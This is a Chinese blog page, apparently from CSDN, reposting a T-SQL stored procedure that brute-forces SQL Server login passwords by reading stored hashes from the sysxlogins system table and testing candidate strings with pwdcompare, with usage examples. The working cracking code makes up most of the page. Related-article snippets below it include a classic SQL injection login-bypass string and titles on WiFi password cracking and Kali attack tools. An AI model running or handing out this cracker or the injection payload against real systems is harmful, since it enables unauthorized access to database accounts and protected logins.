1个破解SQL密码的存储过程

原创 2004年09月22日 08:54:00

原帖:http://community.csdn.net/Expert/topic/3271/3271317.xml?temp=.9382135

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO

/*--穷举法破解 SQL Server 用户密码

 可以破解中文,特殊字符,字符+尾随空格的密码
 为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

 理论上可以破解任意位数的密码
 条件是你的电脑配置足够,时间足够  

--邹建 2004.08(引用请保留此信息)--*/

/*--调用示例
 
 --测试特殊字符
 declare @pwd sysname
 set @pwd=char(0)+'a '
 exec sp_password null,@pwd,'sa'
 exec p_GetPassword 

 --测试带空格的密码
 exec sp_password null,'a  ','sa'
 exec p_GetPassword
 
 --测试中文
 exec sp_password null,'我 ','sa'
 exec p_GetPassword

 --清除密码
 exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=3 --密码破解的位数,默认只破解3位及以下的密码
as
--生成要破解的密码的用户表
select name,password
 ,type=case when xstatus&2048=2048 then 1 else 0 end
 ,jm=case when password is null or datalength(password)<46
   then 1 else 0 end
 ,pwdstr=case when datalength(password)<46
  then cast(password as sysname)
  else cast('' as sysname) end
 ,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
 and name=isnull(@username,name)

--生成临时表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)

--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
 delete from #t where id between 65 and 90 or id between 129 and 254

--密码破解处理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)

--破解1位密码
select @l=0
 ,@s1='id=a.id'
 ,@s2='#t a'
 ,@s3='char(b.id)'
 ,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
 ,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
 and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')

--破解超过2位的密码
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
 select @l=@l+1
  ,@s1=@s1+',id'+cast(@l as varchar)
   +'='+char(@l/26+97)+char(@l%26+97)+'.id'
  ,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
  ,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
  ,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
 exec('
 select '+@s1+' into #tt from '+@s2+'
 update pwd set jm=1,pwdstr='+@s3+'
  ,pwd='+@s4+'
 from #pwd pwd,#tt b
 where pwd.jm=0
  and pwdcompare('+@s3+',pwd.password,pwd.type)=1
 ')
end

--显示破解的密码
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go

SQL万能密码:' or 1='1

select name,pass from tbAdmin where name='admin' and pass='123456' 输入用户名:' or 1='1 SQL变成下面...
  • friendan
  • friendan
  • 2016年08月15日 23:41
  • 12653

绕过or1=1进行sql注入

突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以...
  • most_rabbitfishes
  • most_rabbitfishes
  • 2017年05月10日 09:04
  • 965

Sql Server简单加密与解密

前言:       在SQL Server 2005和SQL Server 2008之前。如果希望加密敏感数据,如财务信息、工资或身份证号,必须借助外部应用程序或算法。SQL Server 2005...
  • xiexuzhao
  • xiexuzhao
  • 2016年11月22日 09:40
  • 426

基于Linux上的wifi密码爆破

wifi破解
  • MrYangLL
  • MrYangLL
  • 2016年07月22日 16:53
  • 3331

分享一个用WinPE怎么来清除你的XP管理员密码的方法

有时我们忘记了Windows XP、2007系统的超级管理员密码,无法进入系统且无法登录带命令行的安全模式,这时可以使用一些工具来修改超级管理员密码,我们这里以天意的winpe为例,介绍修改密码的方法...
  • xokcn
  • xokcn
  • 2013年02月26日 17:57
  • 7738

用nodejs实现登录页面---实现php的功能

首先安装npm工具,该工具node.js已经集成,打开cmd,输入:npm install 下载第三方模块的命令: 进入:www.npmjs.org  npminstall mysql  ...
  • jingjing524000
  • jingjing524000
  • 2018年01月05日 19:21
  • 25

Kali密码攻击工具

Kali密码攻击 破解各种hash密码的必备工具
  • sonbyn001
  • sonbyn001
  • 2017年04月21日 13:20
  • 3028

WIFI密码 高手眼里就是个渣

前几天有个新闻:一个屌丝程序员,用下载的黑客工具,轻松破了隔壁女神的wifi密码,搞到女神很多隐私信息。 实话说,在高手面前,我们每天都用的无线路由器,确实不堪一击。 一般说,路由器的加密方式...
  • hehainan_86
  • hehainan_86
  • 2014年08月20日 08:40
  • 8721

VBA清除Excel密码保护,2003/2007/2010均适用

VBA清除Excel密码保护,2003/2007/2010均适用,直接运行即可清除密码保护
  • rcom10002
  • rcom10002
  • 2014年06月24日 20:08
  • 4645

利用aircrack-ng工具获取附近wifi的密码

利用aircrack-ng工具获取附近wifi的密码
  • u011843461
  • u011843461
  • 2015年01月21日 23:10
  • 4858
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:1个破解SQL密码的存储过程
举报原因:
原因补充:

(最多只允许输入30个字)